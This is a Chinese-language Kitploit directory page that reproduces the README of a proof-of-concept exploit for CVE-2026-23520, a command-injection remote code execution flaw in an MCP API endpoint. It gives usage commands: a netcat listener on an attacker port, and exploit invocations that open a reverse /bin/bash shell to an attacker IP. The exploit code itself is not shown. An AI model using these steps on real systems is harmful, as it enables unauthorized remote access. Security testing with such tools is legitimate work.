Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23520 — CVE-2026-23520 的概念验证漏洞利用程序,该漏洞是 Arcane 更新服务中的命令注入漏洞,可通过精心构造的 API 请求实现远程代码执行。 | Kitploit
工具/GitHubGitHub/cypher-21/cve-2026-23520
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubcypher-21/cve-2026-23520

CVE-2026-23520

CVE-2026-23520 的概念验证漏洞利用程序,该漏洞是 Arcane 更新服务中的命令注入漏洞,可通过精心构造的 API 请求实现远程代码执行。

查看仓库
25个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23520

MCP API 远程命令执行(RCE)PoC


📌 概述

本仓库包含一个针对远程命令执行(RCE)漏洞的概念验证(PoC)利用程序,该漏洞影响暴露易受攻击的 MCP API 端点(通常为 /api/mcp/connect)的应用程序。

该漏洞允许通过精心构造的 API 请求执行系统级命令。


🚀 快速开始

1. 启动监听器

root@kitploit:~
nc -lvnp ATTACKER_PORT

2. 运行利用程序

root@kitploit:~
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT

📥 使用方法

root@kitploit:~
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]

🔑 必需参数

参数描述
target目标 IP、域名或 URL
--lhost攻击者 IP
--lport攻击者端口

🔧 可选参数

标志描述
-p, --port目标端口(默认值:443)
-s, --schemehttp 或 https(默认值:https)
-e, --endpointAPI 端点路径
-t, --timeout请求超时时间
-v, --verbose调试输出

🧪 示例

root@kitploit:~
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
root@kitploit:~
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444

🧠 注意事项

  • 超时不一定表示失败。
  • 确保在利用前已启动监听器。
  • 载荷假定 /bin/bash 可用。

⚠️ 免责声明

仅限授权测试和教育目的使用。


👨‍💻 作者

Parosh B

下载工具